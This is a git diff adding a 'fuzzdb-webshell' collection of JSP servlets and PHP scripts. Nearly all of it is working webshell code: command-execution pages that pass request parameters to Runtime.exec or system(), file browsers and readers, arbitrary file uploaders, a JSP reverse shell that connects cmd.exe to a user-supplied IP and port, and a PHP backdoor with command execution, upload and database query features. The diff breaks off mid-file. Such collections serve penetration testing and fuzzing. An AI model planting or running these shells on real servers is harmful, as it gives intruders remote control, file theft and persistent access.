}
|
||||
}
|
||||
|
||||
out.print("\n<hr></pre>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
public String getServletInfo() {
|
||||
return "CmdServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
BIN
fuzzdb-webshell/jsp/ListServlet.class
Normal file
BIN
fuzzdb-webshell/jsp/ListServlet.class
Normal file
Binary file not shown.
86
fuzzdb-webshell/jsp/ListServlet.java
Normal file
86
fuzzdb-webshell/jsp/ListServlet.java
Normal file
|
@ -0,0 +1,86 @@
|
|||
/*
|
||||
* ListServlet.java
|
||||
*
|
||||
* @author Sierra
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.ServletException;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
public class ListServlet extends HttpServlet
|
||||
{
|
||||
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
PrintWriter printwriter = res.getWriter();
|
||||
String path = req.getParameter("file");
|
||||
|
||||
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
|
||||
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
|
||||
if(req.getParameter("file")==null) path = "c:\\";
|
||||
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
|
||||
|
||||
File file = new File(path);
|
||||
|
||||
if(file.isDirectory())
|
||||
{
|
||||
String s = new String("Unknown");
|
||||
String s2 = new String("Black");
|
||||
File afile[] = file.listFiles();
|
||||
for(int i = 0; i < afile.length; i++)
|
||||
{
|
||||
String s1 = new String(afile[i].toString());
|
||||
printwriter.write("(");
|
||||
String s3;
|
||||
if(afile[i].isDirectory())
|
||||
{
|
||||
printwriter.write("d");
|
||||
s1 = s1 + "/";
|
||||
s3 = new String("Blue");
|
||||
} else
|
||||
if(afile[i].isFile())
|
||||
{
|
||||
printwriter.write("-");
|
||||
s3 = new String("Green");
|
||||
} else
|
||||
{
|
||||
printwriter.write("?");
|
||||
s3 = new String("Red");
|
||||
}
|
||||
if(afile[i].canRead())
|
||||
printwriter.write("r");
|
||||
else
|
||||
printwriter.write("-");
|
||||
if(afile[i].canWrite())
|
||||
printwriter.write("w");
|
||||
else
|
||||
printwriter.write("-");
|
||||
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
|
||||
}
|
||||
|
||||
printwriter.write("<hr></FONT></BODY></HTML>");
|
||||
} else
|
||||
if(file.canRead())
|
||||
{
|
||||
FileInputStream fileinputstream = new FileInputStream(file);
|
||||
int j = 0;
|
||||
while(j >= 0)
|
||||
{
|
||||
j = fileinputstream.read();
|
||||
printwriter.write(j);
|
||||
}
|
||||
fileinputstream.close();
|
||||
} else
|
||||
{
|
||||
printwriter.write("Can't Read file<BR>");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "Directory Listing";
|
||||
}
|
||||
}
|
BIN
fuzzdb-webshell/jsp/UpServlet.class
Normal file
BIN
fuzzdb-webshell/jsp/UpServlet.class
Normal file
Binary file not shown.
71
fuzzdb-webshell/jsp/UpServlet.java
Normal file
71
fuzzdb-webshell/jsp/UpServlet.java
Normal file
|
@ -0,0 +1,71 @@
|
|||
/*
|
||||
* UpServlet.java 29/04/2005
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class UpServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
|
||||
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
|
||||
out.print("<input type=\"submit\" value=\"Upload\">");
|
||||
out.print("</form>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
|
||||
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
String tag = new String();
|
||||
int c = '\0';
|
||||
int contador = 0;
|
||||
ServletInputStream in = req.getInputStream();
|
||||
DataInputStream post = new DataInputStream(in);
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
res.setContentType("text/html");
|
||||
out.print("<pre>");
|
||||
|
||||
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
|
||||
tag=tag.concat("" + (char)c);
|
||||
contador++;
|
||||
}
|
||||
|
||||
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
|
||||
|
||||
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
|
||||
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
|
||||
|
||||
// (!) Uploaded File Name
|
||||
|
||||
File newfile = new File("c:\\install.log");
|
||||
|
||||
/////////////////////////
|
||||
|
||||
FileOutputStream fileout = new FileOutputStream(newfile);
|
||||
|
||||
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
|
||||
c=post.read();
|
||||
fileout.write((char)c);
|
||||
}
|
||||
|
||||
fileout.close();
|
||||
out.print("<== OK");
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "UpServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
1802
fuzzdb-webshell/jsp/browser.jsp
Normal file
1802
fuzzdb-webshell/jsp/browser.jsp
Normal file
File diff suppressed because it is too large
Load diff
35
fuzzdb-webshell/jsp/cmd.jsp
Normal file
35
fuzzdb-webshell/jsp/cmd.jsp
Normal file
|
@ -0,0 +1,35 @@
|
|||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (unix)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
||||
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr);
|
||||
disr = dis.readLine();
|
||||
}
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
||||
|
||||
|
32
fuzzdb-webshell/jsp/cmdjsp.jsp
Normal file
32
fuzzdb-webshell/jsp/cmdjsp.jsp
Normal file
|
@ -0,0 +1,32 @@
|
|||
// note that linux = cmd and windows = "cmd.exe /c + cmd"
|
||||
|
||||
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
|
||||
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) {
|
||||
output += s;
|
||||
}
|
||||
}
|
||||
catch(IOException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<pre>
|
||||
<%=output %>
|
||||
</pre>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
91
fuzzdb-webshell/jsp/jsp-reverse.jsp
Normal file
91
fuzzdb-webshell/jsp/jsp-reverse.jsp
Normal file
|
@ -0,0 +1,91 @@
|
|||
// backdoor.jsp
|
||||
// http://www.security.org.sg/code/jspreverse.html
|
||||
|
||||
<%@
|
||||
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
|
||||
% >
|
||||
<%!
|
||||
static class StreamConnector extends Thread
|
||||
{
|
||||
InputStream is;
|
||||
OutputStream os;
|
||||
|
||||
StreamConnector(InputStream is, OutputStream os)
|
||||
{
|
||||
this.is = is;
|
||||
this.os = os;
|
||||
}
|
||||
|
||||
public void run()
|
||||
{
|
||||
BufferedReader isr = null;
|
||||
BufferedWriter osw = null;
|
||||
|
||||
try
|
||||
{
|
||||
isr = new BufferedReader(new InputStreamReader(is));
|
||||
osw = new BufferedWriter(new OutputStreamWriter(os));
|
||||
|
||||
char buffer[] = new char[8192];
|
||||
int lenRead;
|
||||
|
||||
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
|
||||
{
|
||||
osw.write(buffer, 0, lenRead);
|
||||
osw.flush();
|
||||
}
|
||||
}
|
||||
catch (Exception ioe)
|
||||
|
||||
try
|
||||
{
|
||||
if(isr != null) isr.close();
|
||||
if(osw != null) osw.close();
|
||||
}
|
||||
catch (Exception ioe)
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<h1>JSP Backdoor Reverse Shell</h1>
|
||||
|
||||
<form method="post">
|
||||
IP Address
|
||||
<input type="text" name="ipaddress" size=30>
|
||||
Port
|
||||
<input type="text" name="port" size=10>
|
||||
<input type="submit" name="Connect" value="Connect">
|
||||
</form>
|
||||
<p>
|
||||
<hr>
|
||||
|
||||
<%
|
||||
String ipAddress = request.getParameter("ipaddress");
|
||||
String ipPort = request.getParameter("port");
|
||||
|
||||
if(ipAddress != null && ipPort != null)
|
||||
{
|
||||
Socket sock = null;
|
||||
try
|
||||
{
|
||||
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
|
||||
|
||||
Runtime rt = Runtime.getRuntime();
|
||||
Process proc = rt.exec("cmd.exe");
|
||||
|
||||
StreamConnector outputConnector =
|
||||
new StreamConnector(proc.getInputStream(),
|
||||
sock.getOutputStream());
|
||||
|
||||
StreamConnector inputConnector =
|
||||
new StreamConnector(sock.getInputStream(),
|
||||
proc.getOutputStream());
|
||||
|
||||
outputConnector.start();
|
||||
inputConnector.start();
|
||||
}
|
||||
catch(Exception e)
|
||||
}
|
||||
%>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
77
fuzzdb-webshell/jsp/list.jsp
Normal file
77
fuzzdb-webshell/jsp/list.jsp
Normal file
|
@ -0,0 +1,77 @@
|
|||
<%@ page import="java.util.*,java.io.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// list.jsp = Directory & File View
|
||||
//
|
||||
// by: Sierra
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<%
|
||||
if(request.getParameter("file")==null) {
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="file">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<%
|
||||
}
|
||||
%>
|
||||
<% //read the file name.
|
||||
try {
|
||||
File f = new File(request.getParameter("file"));
|
||||
if(f.isDirectory()) {
|
||||
int i;
|
||||
String fname = new String("Unknown");
|
||||
String fcolor = new String("Black");
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FONT Face="Courier New, Helvetica" Color="Black">
|
||||
<%
|
||||
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
|
||||
File flist[] = f.listFiles();
|
||||
for(i=0; i<flist.length; i++) {
|
||||
fname = new String( flist[i].toString());
|
||||
out.print("(");
|
||||
if(flist[i].isDirectory() == true) {
|
||||
out.print("d");
|
||||
fname = fname + "/";
|
||||
fcolor = new String("Blue");
|
||||
} else if( flist[i].isFile() == true ) {
|
||||
out.print("-");
|
||||
fcolor = new String("Green");
|
||||
} else {
|
||||
out.print("?");
|
||||
fcolor = new String("Red");
|
||||
}
|
||||
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
||||
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
|
||||
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
|
||||
}
|
||||
%>
|
||||
</FONT></BODY></HTML>
|
||||
<%
|
||||
|
||||
} else {
|
||||
if(f.canRead() == true) {
|
||||
InputStream in = new FileInputStream(f);
|
||||
ServletOutputStream outs = response.getOutputStream();
|
||||
int left = 0;
|
||||
try {
|
||||
while((left) >= 0 ) {
|
||||
left = in.read();
|
||||
outs.write(left);
|
||||
}
|
||||
} catch(IOException ex) {ex.printStackTrace();}
|
||||
outs.flush();
|
||||
outs.close();
|
||||
in.close();
|
||||
} else {
|
||||
out.print("Can't Read file<BR>");
|
||||
}
|
||||
}
|
||||
} catch(Exception ex) {ex.printStackTrace();}
|
||||
%>
|
162
fuzzdb-webshell/jsp/up.jsp
Normal file
162
fuzzdb-webshell/jsp/up.jsp
Normal file
|
@ -0,0 +1,162 @@
|
|||
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
|
||||
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// up.jsp = File Upload (unix)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<html>
|
||||
<form name="test" method="post" action="" enctype="multipart/form-data">
|
||||
<input type="File" name="fichero">
|
||||
<input type="Submit" value="Upload" name="Submit">
|
||||
</form>
|
||||
</html>
|
||||
<%!
|
||||
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
|
||||
String boundary = null;
|
||||
Enumeration enum = request.getHeaderNames();
|
||||
while(enum.hasMoreElements()){
|
||||
String header = (String)enum.nextElement();
|
||||
String hvalue = request.getHeader(header);
|
||||
prop.setProperty((header).toLowerCase(),hvalue);
|
||||
if("content-type".equalsIgnoreCase(header) ){
|
||||
int idx = hvalue.lastIndexOf("boundary=");
|
||||
if(idx != -1 ){
|
||||
boundary= hvalue.substring(idx+9 , hvalue.length());
|
||||
}
|
||||
}
|
||||
}
|
||||
return boundary;
|
||||
|
||||
}
|
||||
public String getFileName(String secondline){
|
||||
int len = secondline.length();
|
||||
int idx = secondline.lastIndexOf("filename=");
|
||||
if(idx == -1 ) return null;
|
||||
String filename = secondline.substring(idx+10 , len-1);
|
||||
filename = filename.replace('\\','/');
|
||||
idx = filename.lastIndexOf("/");
|
||||
idx = idx + 1;
|
||||
filename = filename.substring( idx );
|
||||
return filename;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
String DPATH = "/tmp/";
|
||||
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
|
||||
int MAXSIZE = 10; // 10 Mega Byte
|
||||
String boundary = getBoundary(request,prop);
|
||||
if(boundary == null ){
|
||||
boundary = prop.getProperty("boundary");
|
||||
}else{
|
||||
boundary = "--"+boundary;
|
||||
}
|
||||
if(boundary == null ){
|
||||
return;
|
||||
}
|
||||
Long contentsize = new Long(prop.getProperty("content-length","0"));
|
||||
int c;
|
||||
StringWriter st = new StringWriter();
|
||||
if(contentsize.longValue() < 1L ){
|
||||
return;
|
||||
}
|
||||
long l = contentsize.longValue() - ROUGHSIZE;
|
||||
int KB = 1024;
|
||||
int MB = 1024 * KB;
|
||||
int csize = (int)(l / MB);
|
||||
if(csize > MAXSIZE ){
|
||||
return;
|
||||
}
|
||||
ServletInputStream fin = request.getInputStream();
|
||||
int cn;
|
||||
int count=0;
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r') break;
|
||||
st.write(c);
|
||||
count++;
|
||||
}
|
||||
c=fin.read();
|
||||
String tboundary = st.getBuffer().toString();
|
||||
tboundary=tboundary.trim();
|
||||
if(! tboundary.equalsIgnoreCase( boundary) ){
|
||||
return;
|
||||
}
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write(c);
|
||||
}
|
||||
c=fin.read();
|
||||
String secondline = st.getBuffer().toString();
|
||||
String filename = getFileName(secondline);
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write( c );
|
||||
}
|
||||
c=fin.read();
|
||||
|
||||
fin.read();
|
||||
fin.read();
|
||||
File newfile = null;
|
||||
FileOutputStream fout =null;
|
||||
try{
|
||||
if(filename == null) throw new FileNotFoundException("File Name not found");
|
||||
newfile = new File(DPATH+filename);
|
||||
fout = new FileOutputStream( newfile );
|
||||
}catch(FileNotFoundException fnexp){
|
||||
fin.close();
|
||||
return;
|
||||
}
|
||||
|
||||
byte b[] = null;
|
||||
while(l > 1024L){
|
||||
b = new byte[1024];
|
||||
fin.read(b,0,1024);
|
||||
fout.write(b);
|
||||
b=null;
|
||||
l -= 1024L;
|
||||
}
|
||||
if(l > 0){
|
||||
b = new byte[(int)l];
|
||||
fin.read(b,0,(int)l);
|
||||
fout.write(b);
|
||||
}
|
||||
|
||||
|
||||
ByteArrayOutputStream baos = new ByteArrayOutputStream();
|
||||
while((c = fin.read()) != -1){
|
||||
baos.write(c);
|
||||
}
|
||||
String laststring = baos.toString();
|
||||
int idx = laststring.indexOf(boundary);
|
||||
b = baos.toByteArray();
|
||||
if(idx > 2){
|
||||
fout.write(b,0,idx-2);
|
||||
}else{
|
||||
fout.close();
|
||||
newfile.delete();
|
||||
return;
|
||||
}
|
||||
fout.flush();
|
||||
fout.close();
|
||||
fin.close();
|
||||
|
||||
out.println("FileName: " + newfile.getName());
|
||||
out.println("FileSize: " + newfile.length());
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
31
fuzzdb-webshell/jsp/win32/cmd_win32.jsp
Normal file
31
fuzzdb-webshell/jsp/win32/cmd_win32.jsp
Normal file
|
@ -0,0 +1,31 @@
|
|||
<%@ page import="java.util.*,java.io.*,java.net.*"%>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// cmd.jsp = Command Execution (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="POST" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<%
|
||||
if (request.getParameter("cmd") != null) {
|
||||
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
|
||||
OutputStream os = p.getOutputStream();
|
||||
InputStream in = p.getInputStream();
|
||||
DataInputStream dis = new DataInputStream(in);
|
||||
String disr = dis.readLine();
|
||||
while ( disr != null ) {
|
||||
out.println(disr); disr = dis.readLine(); }
|
||||
}
|
||||
%>
|
||||
</pre>
|
||||
</BODY></HTML>
|
162
fuzzdb-webshell/jsp/win32/up_win32.jsp
Normal file
162
fuzzdb-webshell/jsp/win32/up_win32.jsp
Normal file
|
@ -0,0 +1,162 @@
|
|||
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
|
||||
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
|
||||
<%
|
||||
//
|
||||
// JSP_KIT
|
||||
//
|
||||
// up.jsp = File Upload (win32)
|
||||
//
|
||||
// by: Unknown
|
||||
// modified: 27/06/2003
|
||||
//
|
||||
%>
|
||||
<html>
|
||||
<form name="test" method="post" action="" enctype="multipart/form-data">
|
||||
<input type="File" name="fichero">
|
||||
<input type="Submit" value="Upload" name="Submit">
|
||||
</form>
|
||||
</html>
|
||||
<%!
|
||||
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
|
||||
String boundary = null;
|
||||
Enumeration enum = request.getHeaderNames();
|
||||
while(enum.hasMoreElements()){
|
||||
String header = (String)enum.nextElement();
|
||||
String hvalue = request.getHeader(header);
|
||||
prop.setProperty((header).toLowerCase(),hvalue);
|
||||
if("content-type".equalsIgnoreCase(header) ){
|
||||
int idx = hvalue.lastIndexOf("boundary=");
|
||||
if(idx != -1 ){
|
||||
boundary= hvalue.substring(idx+9 , hvalue.length());
|
||||
}
|
||||
}
|
||||
}
|
||||
return boundary;
|
||||
|
||||
}
|
||||
public String getFileName(String secondline){
|
||||
int len = secondline.length();
|
||||
int idx = secondline.lastIndexOf("filename=");
|
||||
if(idx == -1 ) return null;
|
||||
String filename = secondline.substring(idx+10 , len-1);
|
||||
filename = filename.replace('\\','/');
|
||||
idx = filename.lastIndexOf("/");
|
||||
idx = idx + 1;
|
||||
filename = filename.substring( idx );
|
||||
return filename;
|
||||
}
|
||||
%>
|
||||
<%
|
||||
String DPATH = "c:\\";
|
||||
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
|
||||
int MAXSIZE = 10; // 10 Mega Byte
|
||||
String boundary = getBoundary(request,prop);
|
||||
if(boundary == null ){
|
||||
boundary = prop.getProperty("boundary");
|
||||
}else{
|
||||
boundary = "--"+boundary;
|
||||
}
|
||||
if(boundary == null ){
|
||||
return;
|
||||
}
|
||||
Long contentsize = new Long(prop.getProperty("content-length","0"));
|
||||
int c;
|
||||
StringWriter st = new StringWriter();
|
||||
if(contentsize.longValue() < 1L ){
|
||||
return;
|
||||
}
|
||||
long l = contentsize.longValue() - ROUGHSIZE;
|
||||
int KB = 1024;
|
||||
int MB = 1024 * KB;
|
||||
int csize = (int)(l / MB);
|
||||
if(csize > MAXSIZE ){
|
||||
return;
|
||||
}
|
||||
ServletInputStream fin = request.getInputStream();
|
||||
int cn;
|
||||
int count=0;
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r') break;
|
||||
st.write(c);
|
||||
count++;
|
||||
}
|
||||
c=fin.read();
|
||||
String tboundary = st.getBuffer().toString();
|
||||
tboundary=tboundary.trim();
|
||||
if(! tboundary.equalsIgnoreCase( boundary) ){
|
||||
return;
|
||||
}
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write(c);
|
||||
}
|
||||
c=fin.read();
|
||||
String secondline = st.getBuffer().toString();
|
||||
String filename = getFileName(secondline);
|
||||
st.close();
|
||||
st = null;
|
||||
st = new StringWriter();
|
||||
while((c=fin.read()) != -1 ){
|
||||
if( c == '\r' ) break;
|
||||
st.write( c );
|
||||
}
|
||||
c=fin.read();
|
||||
|
||||
fin.read();
|
||||
fin.read();
|
||||
File newfile = null;
|
||||
FileOutputStream fout =null;
|
||||
try{
|
||||
if(filename == null) throw new FileNotFoundException("File Name not found");
|
||||
newfile = new File(DPATH+filename);
|
||||
fout = new FileOutputStream( newfile );
|
||||
}catch(FileNotFoundException fnexp){
|
||||
fin.close();
|
||||
return;
|
||||
}
|
||||
|
||||
byte b[] = null;
|
||||
while(l > 1024L){
|
||||
b = new byte[1024];
|
||||
fin.read(b,0,1024);
|
||||
fout.write(b);
|
||||
b=null;
|
||||
l -= 1024L;
|
||||
}
|
||||
if(l > 0){
|
||||
b = new byte[(int)l];
|
||||
fin.read(b,0,(int)l);
|
||||
fout.write(b);
|
||||
}
|
||||
|
||||
|
||||
ByteArrayOutputStream baos = new ByteArrayOutputStream();
|
||||
while((c = fin.read()) != -1){
|
||||
baos.write(c);
|
||||
}
|
||||
String laststring = baos.toString();
|
||||
int idx = laststring.indexOf(boundary);
|
||||
b = baos.toByteArray();
|
||||
if(idx > 2){
|
||||
fout.write(b,0,idx-2);
|
||||
}else{
|
||||
fout.close();
|
||||
newfile.delete();
|
||||
return;
|
||||
}
|
||||
fout.flush();
|
||||
fout.close();
|
||||
fin.close();
|
||||
|
||||
out.println("FileName: " + newfile.getName());
|
||||
out.println("FileSize: " + newfile.length());
|
||||
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
25
fuzzdb-webshell/php/cmd.php
Normal file
25
fuzzdb-webshell/php/cmd.php
Normal file
|
@ -0,0 +1,25 @@
|
|||
<?
|
||||
//
|
||||
// PHP_KIT
|
||||
//
|
||||
// cmd.php = Command Execution
|
||||
//
|
||||
// by: The Dark Raver
|
||||
// modified: 21/01/2004
|
||||
//
|
||||
?>
|
||||
<HTML><BODY>
|
||||
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||
<INPUT TYPE="text" NAME="cmd">
|
||||
<INPUT TYPE="submit" VALUE="Send">
|
||||
</FORM>
|
||||
<pre>
|
||||
<?
|
||||
if($_GET['cmd']) {
|
||||
system($_GET['cmd']);
|
||||
}
|
||||
?>
|
||||
</pre>
|
||||
</BODY></HTML>
|
||||
|
||||
|
33
fuzzdb-webshell/php/list.php
Normal file
33
fuzzdb-webshell/php/list.php
Normal file
|
@ -0,0 +1,33 @@
|
|||
<?
|
||||
//
|
||||
// PHP_KIT
|
||||
//
|
||||
// list.php = Directory & File Listing
|
||||
//
|
||||
// by: The Dark Raver
|
||||
// modified: 21/01/2004
|
||||
//
|
||||
?>
|
||||
|
||||
<?
|
||||
|
||||
if($_GET['file']) {
|
||||
$fichero=$_GET['file'];
|
||||
} else {
|
||||
$fichero="/";
|
||||
}
|
||||
|
||||
if($handle = @opendir($fichero)) {
|
||||
while($filename = readdir($handle)) {
|
||||
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
|
||||
}
|
||||
closedir($handle);
|
||||
} else {
|
||||
echo "FILE: " . $fichero . "<br><hr><pre>";
|
||||
$fp = fopen($fichero, "r");
|
||||
$buffer = fread($fp, filesize($fichero));
|
||||
echo $buffer;
|
||||
fclose($fp);
|
||||
}
|
||||
|
||||
?>
|
71
fuzzdb-webshell/php/php-backdoor.php
Normal file
71
fuzzdb-webshell/php/php-backdoor.php
Normal file
|
@ -0,0 +1,71 @@
|
|||
<?
|
||||
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
|
||||
|
||||
ob_implicit_flush();
|
||||
if(isset($_REQUEST['f'])){
|
||||
$filename=$_REQUEST['f'];
|
||||
$file=fopen("$filename","rb");
|
||||
fpassthru($file);
|
||||
die;
|
||||
}
|
||||
if(isset($_REQUEST['d'])){
|
||||
$d=$_REQUEST['d'];
|
||||
echo "<pre>";
|
||||
if ($handle = opendir("$d")) {
|
||||
echo "<h2>listing of $d</h2>";
|
||||
while ($dir = readdir($handle)){
|
||||
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
|
||||
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
|
||||
echo "$dir\n";
|
||||
echo "</font></a>";
|
||||
}
|
||||
|
||||
} else echo "opendir() failed";
|
||||
closedir($handle);
|
||||
die ("<hr>");
|
||||
}
|
||||
if(isset($_REQUEST['c'])){
|
||||
echo "<pre>";
|
||||
system($_REQUEST['c']);
|
||||
die;
|
||||
}
|
||||
if(isset($_REQUEST['upload'])){
|
||||
|
||||
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
|
||||
else $dir=$_REQUEST['dir'];
|
||||
$fname=$HTTP_POST_FILES['file_name']['name'];
|
||||
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
|
||||
die('file uploading error.');
|
||||
}
|
||||
if(isset($_REQUEST['mquery'])){
|
||||
|
||||
$host=$_REQUEST['host'];
|
||||
$usr=$_REQUEST['usr'];
|
||||
$passwd=$_REQUEST['passwd'];
|
||||
$db=$_REQUEST['db'];
|
||||
$mquery=$_REQUEST['mquery'];
|
||||
mysql_connect("$host", "$usr", "$passwd") or
|
||||
die("Could not connect: " . mysql_error());
|
||||
mysql_select_db("$db");
|
||||
$result = mysql_query("$mquery");
|
||||
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
|
||||
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
|
||||
mysql_free_result($result);
|
||||
die;
|
||||
}
|
||||
?>
|
||||
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
|
||||
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
|
||||
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir"> <input type="submit" name="upload" value="upload"></form>
|
||||
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
|
||||
<br>for example:
|
||||
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
|
||||
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
|
||||
<hr>execute mysql query:
|
||||
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
|
||||
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
|
||||
|
||||
